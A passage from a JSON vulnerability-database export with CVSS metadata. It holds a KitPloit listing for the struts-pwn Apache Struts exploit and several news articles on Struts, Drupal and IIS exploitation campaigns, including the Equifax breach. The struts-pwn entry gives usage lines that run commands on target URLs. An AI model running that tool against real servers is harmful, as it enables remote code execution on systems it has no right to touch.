"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-09-21T12:00:00", "type": "kitploit", "title": "Mitaka - A Browser Extension For OSINT Search", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2019-09-21T12:00:07", "id": "KITPLOIT:8708017483803645203", "href": "http://www.kitploit.com/2019/09/mitaka-browser-extension-for-osint.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T17:02:20", "description": "[![](https://2.bp.blogspot.com/-11EAxL668ng/WMfWw388UFI/AAAAAAAAHa8/FeOT6wUDm_s_Ro41Cs6Ttq7cMXH5BPATQCLcB/s1600/struts-pwn.png)](<https://2.bp.blogspot.com/-11EAxL668ng/WMfWw388UFI/AAAAAAAAHa8/FeOT6wUDm_s_Ro41Cs6Ttq7cMXH5BPATQCLcB/s1600/struts-pwn.png>)\n\n \n** An exploit for Apache Struts CVE-2017-5638** \n \n** ** Usage ** ** \n \n** Testing a single URL. ** \n\n \n \n python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id'\n\n \n** Testing a list of URLs. ** \n\n \n \n python struts-pwn.py --list 'urls.txt' -c 'id'\n\n \n** Checking if the vulnerability exists against a single URL. ** \n\n \n \n python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action'\n\n \n** Checking if the vulnerability exists against a list of URLs. ** \n\n \n \n python struts-pwn.py --check --list 'urls.txt'\n\n \n** ** Requirements ** ** \n\n\n * Python2 or Python3 \n * requests \n \n** ** Legal Disclaimer ** ** \nThis project is made for educational and ethical testing purposes only. Usage of struts-pwn for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. \n \n** ** Author ** ** \n_ Mazin Ahmed _ \n\n\n * Website: [ https://mazinahmed.net ](<https://mazinahmed.net/>)\n * Email: _ mazin AT mazinahmed DOT net _\n * Twitter: [ https://twitter.com/mazen160 ](<https://twitter.com/mazen160>)\n * Linkedin: [ http://linkedin.com/in/infosecmazinahmed](<http://linkedin.com/in/infosecmazinahmed>)\n \n\n\n** [ Download struts-pwn ](<https://github.com/mazen160/struts-pwn>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-14T13:34:00", "type": "kitploit", "title": "struts-pwn - An exploit for Apache Struts CVE-2017-5638", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-14T13:34:05", "id": "KITPLOIT:1841841790447853746", "href": "http://www.kitploit.com/2017/03/struts-pwn-exploit-for-apache-struts.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:40:18", "description": "[![apache struts vulnerability hacking](https://thehackernews.com/images/-ktDJMSI6Gdo/W310Im7Od5I/AAAAAAAAx8k/iNNQd5VURi8zRV8-MZosbkEo-V4eXjqowCLcBGAs/s728-e100/apache-struts-vulnerability-hacking.png)](<https://thehackernews.com/images/-ktDJMSI6Gdo/W310Im7Od5I/AAAAAAAAx8k/iNNQd5VURi8zRV8-MZosbkEo-V4eXjqowCLcBGAs/s728-e100/apache-struts-vulnerability-hacking.png>)\n\nSemmle security researcher Man Yue Mo has [disclosed](<https://lgtm.com/blog/apache_struts_CVE-2018-11776>) a critical remote code execution vulnerability in the popular Apache Struts web application framework that could allow remote attackers to run malicious code on the affected servers. \n \nApache Struts is an open source framework for developing web applications in the Java programming language and is widely used by enterprises globally, including by 65 percent of the Fortune 100 companies, like Vodafone, Lockheed Martin, Virgin Atlantic, and the IRS. \n \nThe vulnerability (**CVE-2018-11776**) resides in the core of Apache Struts and originates because of insufficient validation of user-provided untrusted inputs in the core of the Struts framework under certain configurations. \n \nThe newly found Apache Struts exploit can be triggered just by visiting a specially crafted URL on the affected web server, allowing attackers to execute malicious code and eventually take complete control over the targeted server running the vulnerable application. \n \n\n\n## Struts2 Vulnerability - Are You Affected?\n\n \nAll applications that use Apache Struts\u2014supported versions (Struts 2.3 to Struts 2.3.34, and Struts 2.5 to Struts 2.5.16) and even some unsupported Apache Struts versions\u2014are potentially vulnerable to this flaw, even when no additional plugins have been enabled. \n \n\n\n> \"This vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed, opening up an attack vector to malicious hackers,\" Yue Mo said.\n\n \nYour Apache Struts implementation is vulnerable to the reported RCE flaw if it meets the following conditions: \n\n\n * The **alwaysSelectFullNamespace** flag is set to true in the Struts configuration.\n * Struts configuration file contains an \"action\" or \"url\" tag that does not specify the optional namespace attribute or specifies a wildcard namespace.\nAccording to the researcher, even if an application is currently not vulnerable, \"an inadvertent change to a Struts configuration file may render the application vulnerable in the future.\" \n \n\n\n## Here's Why You Should Take Apache Struts Exploit Seriously\n\n \nLess than a year ago, credit rating agency Equifax exposed [personal details of its 147 million consumers](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) due to their failure of patching a similar [Apache Struts flaw](<https://thehackernews.com/2017/03/apache-struts-framework.html>) that was disclosed earlier that year (CVE-2017-5638). \n \nThe Equifax breach cost the company over $600 million in losses. \n\n\n> \"Struts is used for publicly-accessible customer-facing websites, vulnerable systems are easily identified, and the flaw is easy to exploit,\" said Pavel Avgustinov, Co-founder & VP of QL Engineering at Semmle.\n\n> \"A hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system.\"\n\n \n\n\n## Patch Released for Critical Apache Struts Bug\n\n[![apache struts vulnerability exploit](https://thehackernews.com/images/-aZ6JnELsib4/W31pGhAz6bI/AAAAAAAAx8M/0d3umSPy5YATSc8sNXCx5cKejhIftncEgCLcBGAs/s728-e100/apache-struts-vulnerability-exploit.png)](<https://thehackernews.com/images/-aZ6JnELsib4/W31pGhAz6bI/AAAAAAAAx8M/0d3umSPy5YATSc8sNXCx5cKejhIftncEgCLcBGAs/s728-e100/apache-struts-vulnerability-exploit.png>)\n\nApache Struts has fixed the vulnerability with the release of Struts versions 2.3.35 and 2.5.17. Organizations and developers who use Apache Struts are urgently advised to upgrade their Struts components as soon as possible. \n \nWe have seen how previous disclosures of similar critical flaws in Apache Struts have resulted in [PoC exploits](<https://thehackernews.com/2017/03/apache-struts-framework.html>) being published within a day, and exploitation of the [vulnerability in the wild](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>), putting critical infrastructure as well as customers' data at risk. \n \nTherefore, users and administrators are strongly advised to upgrade their Apache Struts components to the latest versions, even if they believe their configuration is not vulnerable right now. \n \nThis is not the first time the Semmle Security Research Team has reported a critical RCE flaw in Apache Struts. Less than a year ago, the team disclosed a similar [remote code execution vulnerability](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) (CVE-2017-9805) in Apache Struts. \n \n\n\n## UPDATE \u2014 Apache Struts RCE Exploit PoC Released\n\n[![apache struts exploit poc rce vulnerability](https://thehackernews.com/images/-fNjQzu1b7iw/W376YS-nYjI/AAAAAAAAx9I/T7MopN2IxtwTxicu4k8j55ywy0GbIRQHgCLcBGAs/s728-e100/apache-struts-exploit-poc-rce-vulnerability.png)](<https://thehackernews.com/images/-fNjQzu1b7iw/W376YS-nYjI/AAAAAAAAx9I/T7MopN2IxtwTxicu4k8j55ywy0GbIRQHgCLcBGAs/s728-e100/apache-struts-exploit-poc-rce-vulnerability.png>)\n\nA security researcher has today released [a PoC exploit](<https://github.com/jas502n/St2-057/blob/master/README.md>) for the newly discovered remote code execution (RCE) vulnerability (CVE-2018-11776) in Apache Struts web application framework.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-08-22T14:04:00", "type": "thn", "title": "New Apache Struts RCE Flaw Lets Hackers Take Over Web Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805", "CVE-2018-11776"], "modified": "2018-08-23T18:30:56", "id": "THN:89C2482FECD181DD37C6DAEEB7A66FA9", "href": "https://thehackernews.com/2018/08/apache-struts-vulnerability.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:40:36", "description": "[![drupalgeddon-exploit](https://thehackernews.com/images/-zMSVUp45Ep4/WtcTP9bdJsI/AAAAAAAAwTg/e-HDb99w0307p9aEkp1TPTePjTvSe7JRQCLcBGAs/s728-e100/drupalgeddon-exploit.png)](<https://thehackernews.com/images/-zMSVUp45Ep4/WtcTP9bdJsI/AAAAAAAAwTg/e-HDb99w0307p9aEkp1TPTePjTvSe7JRQCLcBGAs/s728-e100/drupalgeddon-exploit.png>)\n\nThe Drupal vulnerability (CVE-2018-7600), dubbed [Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) that could allow attackers to completely take over vulnerable websites has now been exploited in the wild to deliver malware backdoors and cryptocurrency miners. \n \nDrupalgeddon2, a highly critical remote code execution vulnerability discovered two weeks ago in Drupal content management system software, was recently patched by the company without releasing its technical details. \n \nHowever, just a day after security researchers at Check Point and Dofinity published complete details, a Drupalgeddon2 proof-of-concept (PoC) [exploit code](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) was made widely available, and large-scale Internet scanning and exploitation attempts followed. \n \nAt the time, no incident of targets being hacked was reported, but over the weekend, several security firms noticed that attackers have now started exploiting the vulnerability to install cryptocurrency miner and other malware on vulnerable websites. \n \nThe SANS Internet Storm Center [spotted](<https://isc.sans.edu/forums/diary/A+Review+of+Recent+Drupal+Attacks+CVE20187600/23563/>) some attacks to deliver a cryptocurrency miner, a PHP backdoor, and an IRC bot written in Perl. \n\n\n[![drupal-website-hacking](https://thehackernews.com/images/-cgGXAVXKeKc/WtcOhdYr0iI/AAAAAAAAwTQ/gXhXTplYR4oUU-jDAmOdEpSV_ZIIDPweACLcBGAs/s728-e100/drupal-website-hacking.png)](<https://thehackernews.com/images/-cgGXAVXKeKc/WtcOhdYr0iI/AAAAAAAAwTQ/gXhXTplYR4oUU-jDAmOdEpSV_ZIIDPweACLcBGAs/s728-e100/drupal-website-hacking.png>)\n\nThe simple PHP backdoor allows attackers to upload additional files (backdoors) to the targeted server. \n \nA thread on SANS ISC Infosec forums also [suggests](<https://isc.sans.edu/forums/diary/Drupal+CVE20187600+PoC+is+Public/23549/>) that Drupalgeddon2 is being used to install the XMRig Monero miner on vulnerable websites. Besides the actual XMRig miner, the malicious script also downloads additional files, including a script to kill competing miners on the targeted system. \n \nResearchers from security firm Volexity have also [observed](<https://www.volexity.com/blog/2018/04/16/drupalgeddon-2-profiting-from-mass-exploitation/>) a wide variety of actions and payloads attempted via the public exploit for Drupalgeddon2 to deliver malicious scripts that install backdoors and cryptocurrency miners on the vulnerable sites. \n \nThe researchers believed that one of the Monero miner campaigns, delivering XMRig, is associated with a criminal group that exploited the vulnerability (CVE-2017-10271) in Oracle WebLogic servers to deliver cryptocurrency miner malware shortly after its PoC exploit code was made public in late 2017. \n\n\n[![drupal-hacking](https://thehackernews.com/images/-cWUncg7VBfo/WtcN9yL7mTI/AAAAAAAAwTI/--A-g7ptWeIueY8TO5tvLWL1aijI9OAjgCLcBGAs/s728-e100/drupal-hacking.png)](<https://thehackernews.com/images/-cWUncg7VBfo/WtcN9yL7mTI/AAAAAAAAwTI/--A-g7ptWeIueY8TO5tvLWL1aijI9OAjgCLcBGAs/s728-e100/drupal-hacking.png>)\n\nVolexity identified some of the group's wallets that had stored a total of 544.74 XMR (Monero coin), which is equivalent to almost $105,567. \n \nAs we reported in our previous article, Imperva stats [showed](<https://www.imperva.com/blog/2018/04/drupalgeddon-2-0-are-hackers-slacking-off/>) that 90% of the Drupalgeddon2 attacks are simply IP scanning in an attempt to find vulnerable systems, 3% are backdoor infection attempts, and 2% are attempting to run crypto miners on the targets. \n \nFor those unaware, Drupalgeddon2 allows an unauthenticated, remote attacker to execute malicious code on default or common Drupal installations under the privileges of the user, affecting all versions of Drupal from 6 to 8. \n \nTherefore, site admins were highly recommended to patch the issue by updating their CMS to Drupal 7.58 or Drupal 8.5.1 as soon as possible. \n\n\n> In its advisory, Drupal [warned](<https://www.drupal.org/psa-2018-002>) that \"sites not patched by Wednesday, 2018-04-11 may be compromised\" and \"simply updating Drupal will not remove backdoors or fix compromised sites.\"\n\nMoreover, \n\n\n> \"If you find that your site is already patched, but you didn't do it, that can be a symptom that the site was compromised. Some attacks in the past have applied the patch as a way to guarantee that only that attacker is in control of the site.\"\n\nHere's a guide Drupal team suggest to follow [if your website has been hacked](<https://www.drupal.org/node/2365547>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-18T09:49:00", "type": "thn", "title": "Hackers Exploiting Drupal Vulnerability to Inject Cryptocurrency Miners", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271", "CVE-2018-7600"], "modified": "2018-04-18T09:50:03", "id": "THN:F03064A70C65D9BD62A8F5898BA276D2", "href": "https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-27T09:17:55", "description": "[![equifax-apache-struts](https://3.bp.blogspot.com/-F7ViQ9JXvL8/Wbo_3TiAKWI/AAAAAAAAAJM/fsHVxS_O8ysIy4sZ2wdnG1OfLkiNJTjzgCLcBGAs/s1600/equifax-apache-struts.png)](<https://3.bp.blogspot.com/-F7ViQ9JXvL8/Wbo_3TiAKWI/AAAAAAAAAJM/fsHVxS_O8ysIy4sZ2wdnG1OfLkiNJTjzgCLcBGAs/s1600/equifax-apache-struts.png>)\n\nThe [massive Equifax data breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) that exposed highly sensitive data of as many as 143 million people was caused by [exploiting a flaw in Apache Struts](<https://thehackernews.com/2017/03/apache-struts-framework.html>) framework, which Apache patched over two months earlier of the security incident, Equifax has confirmed. \n \nCredit rating agency Equifax is yet another example of the companies that became victims of massive cyber attacks due to not patching a critical vulnerability on time, for which patches were already issued by the respected companies. \n \nRated critical with a maximum 10.0 score, the Apache Struts2 vulnerability (CVE-2017-5638) exploited in the Equifax breach was disclosed and fixed by Apache on March 6 with the release of Apache Struts version 2.3.32 or 2.5.10.1. \n \nThis flaw is separate from CVE-2017-9805, [another Apache Struts2 vulnerability](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) that was patched earlier this month, which was a programming bug that manifests due to the way Struts REST plugin handles XML payloads while deserializing them, and was fixed in Struts version 2.5.13. \n \nRight after the disclosure of the vulnerability, hackers started actively exploiting the flaw in the wild to install rogue applications on affected web servers after its [proof-of-concept (PoC) exploit code](<https://thehackernews.com/2017/03/apache-struts-framework.html>) was uploaded to a Chinese site. \n \nDespite patches were made available and proofs that the flaw was already under mass attack by hackers, Equifax failed to patched its Web applications against the flaw, which resulted in the breach of personal data of [nearly half of the US population](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>). \n\n\n> \"Equifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cyber security firm to determine what information was accessed and who have been impacted,\" the company officials wrote in an [update on the website](<https://www.equifaxsecurity2017.com/>) with a new \"A Progress Update for Consumers.\" \n\n> \"We [know that](<https://www.equifaxsecurity2017.com/2017/09/13/progress-update-consumers-4/>) criminals exploited a US website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\"\n\nCVE-2017-5638 was a then-zero-day vulnerability discovered in the [popular Apache Struts](<https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html>) web application framework by Cisco's Threat intelligence firm Talos, which observed a number of active attacks exploiting the flaw. \n \nThe issue was a remote code execution bug in the Jakarta Multipart parser of Apache Struts2 that could allow an attacker to execute malicious commands on the server when uploading files based on the parser. \n \nAt the time, Apache warned it was possible to perform a remote code execution attack with \"a malicious Content-Type value,\" and if this value is not valid \"an exception is thrown which is then used to display an error message to a user.\" \n \n**Also Read: **[Steps You Should Follow to Protect Yourself From Equifax Breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) \n \nFor those unaware, Apache Struts is a free, open-source MVC framework for developing web applications in the Java programming language that run both front-end and back-end Web servers. The framework is used by 65n per cent of the Fortune 100 companies, including Lockheed Martin, Vodafone, Virgin Atlantic, and the IRS. \n \nSince the hackers are actively exploiting the vulnerabilities in the Apache Struts web framework, Cisco has also [initiated an investigation](<https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html>) into its products against four newly discovered security vulnerabilities in Apache Struts2. \n \nOther companies that also incorporate a version of Apache Struts 2 should also check their infrastructures against these vulnerabilities. \n \nEquifax is currently offering free credit-monitoring and identity theft protection services for people who are affected by the massive data leak and has also enabled a security freeze for access to people's information. \n \nWhile the company was initially criticised for generating a PIN that was simply a time and date stamp and easy-to-guess, the PIN generation method was later changed to randomly generate numbers.\n", "cvss3": {}, "published": "2017-09-13T21:38:00", "type": "thn", "title": "Equifax Suffered Data Breach After It Failed to Patch Old Apache Struts Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-15T10:00:54", "id": "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "href": "https://thehackernews.com/2017/09/equifax-apache-struts.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T10:06:55", "description": "[![apache-struts-flaws-cisco](https://3.bp.blogspot.com/-_apYSKyOUKo/Wbe7DDGoMfI/AAAAAAAAC0o/yPE-wNpS2n83-GU6fD28_WevBKtwhDX1gCLcBGAs/s1600/apache-struts-cisco.jpg)](<https://3.bp.blogspot.com/-_apYSKyOUKo/Wbe7DDGoMfI/AAAAAAAAC0o/yPE-wNpS2n83-GU6fD28_WevBKtwhDX1gCLcBGAs/s1600/apache-struts-cisco.jpg>)\n\nAfter [Equifax massive data breach](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) that was believed to be caused due to [a vulnerability in Apache Struts](<https://thehackernews.com/2017/03/apache-struts-framework.html>), Cisco has initiated an investigation into its products that incorporate a version of the popular Apache Struts2 web application framework. \n \nApache Struts is a free, open-source MVC framework for developing web applications in the Java programming language, and used by 65 percent of the Fortune 100 companies, including Lockheed Martin, Vodafone, Virgin Atlantic, and the IRS. \n \nHowever, the popular open-source software package was recently found affected by multiple vulnerabilities, including two remote code execution vulnerabilities\u2014one discovered earlier this month, and another in March\u2014one of which is [believed to be used](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>) to breach personal data of over [143 million Equifax users](<https://thehackernews.com/2017/09/equifax-data-breach.html>). \n \nSome of Cisco products including its Digital Media Manager, MXE 3500 Series Media Experience Engines, Network Performance Analysis, Hosted Collaboration Solution for Contact Center, and Unified Contact Center Enterprise have been found vulnerable to multiple Apache Struts flaws. \n \n\n\n### Cisco Launches Apache Struts Vulnerability Hunting\n\n \nCisco is also testing rest of its products against four newly discovered security vulnerability in Apache Struts2, including the one (CVE-2017-9805) [we reported on September 5](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) and the remaining three also disclosed last week. \n \nHowever, the remote code execution bug (CVE-2017-5638) that was [actively exploited back in March](<https://thehackernews.com/2017/03/apache-struts-framework.html>) this year is not included by the company in its recent security audit. \n \nThe three vulnerabilities\u2014CVE-2017-9793, CVE-2017-9804 and CVE-2017-9805\u2014included in the [Cisco security audit](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170907-struts2>) was released by the Apache Software Foundation on 5th September with the release of Apache Struts 2.5.13 which patched the issues. \n \nThe fourth vulnerability (CVE-2017-12611) that is being [investigated by Cisco](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170909-struts2-rce>) was released on 7th September with the release of Apache Struts 2.3.34 that fixed the flaw that resided in the Freemarker tag functionality of the Apache Struts2 package and could allow an unauthenticated, remote attacker to execute malicious code on an affected system. \n \n\n\n### Apache Struts Flaw Actively Exploited to Hack Servers & Deliver Malware\n\n \nComing on to the most severe of all, CVE-2017-9805 (assigned as critical) is a programming bug that manifests due to the way Struts REST plugin handles XML payloads while deserializing them. \n \nThis could allow a remote, unauthenticated attacker to achieve remote code execution on a host running a vulnerable version of Apache Struts2, and Cisco's Threat intelligence firm Talos has [observed](<http://blog.talosintelligence.com/2017/09/apache-struts-being-exploited.html>) that this flaw is [under active exploitation](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) to find vulnerable servers. \n \nSecurity researchers from data centre security vendor Imperva recently [detected](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>) and blocked thousands of attacks attempting to exploit this Apache Struts2 vulnerability (CVE-2017-9805), with roughly 80 percent of them tried to deliver a malicious payload. \n \nThe majority of attacks originated from China with a single Chinese IP address registered to a Chinese e-commerce company sending out more than 40% of all the requests. Attacks also came from Australia, the U.S., Brazil, Canada, Russia and various parts of Europe. \n \nOut of the two remaining flaws, one (CVE-2017-9793) is again a vulnerability in the REST plug-in for Apache Struts that manifests due to \"insufficient validation of user-supplied input by the XStream library in the REST plug-in for the affected application.\" \n \nThis flaw has been given a Medium severity and could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on targeted systems. \n \nThe last flaw (CVE-2017-9804) also allows an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected system but resides in the URLValidator feature of Apache Struts. \n \nCisco is testing its products against these vulnerabilities including its WebEx Meetings Server, the Data Center Network Manager, Identity Services Engine (ISE), MXE 3500 Series Media Experience Engines, several Cisco Prime products, some products for voice and unified communications, as well as video and streaming services. \n \nAt the current, there are no software patches to address the vulnerabilities in Cisco products, but the company promised to release updates for affected software which will soon be accessible through the [Cisco Bug Search Tool](<https://bst.cloudapps.cisco.com/bugsearch/bug/BUGID>). \n \nSince the framework is being widely used by a majority of top 100 fortune companies, they should also check their infrastructures against these vulnerabilities that incorporate a version of Apache Struts2.\n", "cvss3": {}, "published": "2017-09-11T23:50:00", "type": "thn", "title": "Apache Struts 2 Flaws Affect Multiple Cisco Products", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-9804", "CVE-2017-5638", "CVE-2017-9793", "CVE-2017-9805", "CVE-2017-12611"], "modified": "2017-09-12T10:51:16", "id": "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "href": "https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:54", "description": "[![monero-cryptocurrency-miner](https://2.bp.blogspot.com/-N1NgWf7E664/Wc0jrnhaaKI/AAAAAAAAASA/K3oOehzEnLAJnuCsIlelN3BJDWmsD8ocwCLcBGAs/s1600/monero-cryptocurrency-miner.png)](<https://2.bp.blogspot.com/-N1NgWf7E664/Wc0jrnhaaKI/AAAAAAAAASA/K3oOehzEnLAJnuCsIlelN3BJDWmsD8ocwCLcBGAs/s1600/monero-cryptocurrency-miner.png>)\n\nMining cryptocurrencies can be a costly investment as it takes a monstrous amount of computing power, and thus hackers have started using malware that steals computing resources of computers it hijacks to make lots of dollars in digital currency. \n \nSecurity researchers at security firm ESET have spotted one such malware that infected hundreds of Windows web servers with a malicious cryptocurrency miner and helped cybercriminals made more than $63,000 worth of Monero (XMR) in just three months. \n \nAccording to a [report](<https://blog.eset.ie/2017/09/28/money-making-machine-monero-mining-malware/>) published by ESET today, cybercriminals only made modifications to legitimate open source Monero mining software and exploited a known vulnerability in Microsoft IIS 6.0 to secretly install the miner on unpatched Windows servers. \n \nAlthough ESET's investigation does not identify the attackers, it reports that the attackers have been infecting unpatched Windows web servers with the cryptocurrency miner since at least May 2017 to mine 'Monero,' a Bitcoin-like cryptocurrency. \n \nThe vulnerability (_CVE-2017-7269_) exploited by the attackers was discovered in March 2017 by Zhiniang Peng and Chen Wu and resides in the WebDAV service of Microsoft IIS version 6.0\u2014the web server in Windows Server 2003 R2. \n \nTherefore, hackers are only targeting unpatched machines running Windows Server 2003 to make them part of a botnet, which has already helped them made over $63,000 worth of Monero. \n\n\n[![windows-iis-server-exploit](https://3.bp.blogspot.com/-z1EWQ1aMMKA/Wc0ftXn4_CI/AAAAAAAAAR0/ECFTdRI_acwh1dQdtls6PU8LSZq1d9GqgCLcBGAs/s1600/windows-iis-server-exploit.png)](<https://3.bp.blogspot.com/-z1EWQ1aMMKA/Wc0ftXn4_CI/AAAAAAAAAR0/ECFTdRI_acwh1dQdtls6PU8LSZq1d9GqgCLcBGAs/s1600/windows-iis-server-exploit.png>)\n\n \nSince the vulnerability is on a web server, which is meant to be visible from the internet, it can be accessed and exploited by anyone. You can learn more about the vulnerability [here](<https://javiermunhoz.com/blog/2017/04/17/cve-2017-7269-iis-6.0-webdav-remote-code-execution.html>). \n \nThe newly discovered malware mines Monero that has a total market valuation of about $1.4 billion, which is far behind Bitcoin in market capitalisation, but cybercriminals\u2019 love for Monero is due to its focus on privacy. \n \nUnlike Bitcoin, Monero offers untraceable transactions and is anonymous cryptocurrency in the world today. \n \nAnother reason of hackers favouring Monero is that it uses a proof-of-work algorithm called **CryptoNight**, which suits computer or server CPUs and GPUs, while Bitcoin mining requires specific mining hardware. \n \nHowever, this is not the first time when analysts have spotted such [malware mining Monero](<https://thehackernews.com/2017/05/cryptocurrency-mining-botnet.html>) by stealing computing resources of compromised computers. \n \nIn mid-May, Proofpoint researcher Kafeine discovered cryptocurrency mining malware, called '[Adylkuzz](<https://thehackernews.com/2017/05/smb-exploit-cryptocurrency-mining.html>),' which was using EternalBlue exploit\u2014created by the NSA and dumped last month by the Shadow Brokers in April\u2014to infect unpatched Windows systems to mine Monero. \n \nA week before that, GuardiCore researchers discovered a new botnet malware, dubbed [BondNet](<https://thehackernews.com/2017/05/cryptocurrency-mining-botnet.html>), that was also infecting Windows systems, with a combination of techniques, for primarily mining Monero.\n", "cvss3": {}, "published": "2017-09-28T05:33:00", "type": "thn", "title": "Hackers Exploiting Microsoft Servers to Mine Monero - Makes $63,000 In 3 Months", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-7269"], "modified": "2017-09-28T17:28:53", "id": "THN:129FB15A6EC81B3F21210807A7547381", "href": 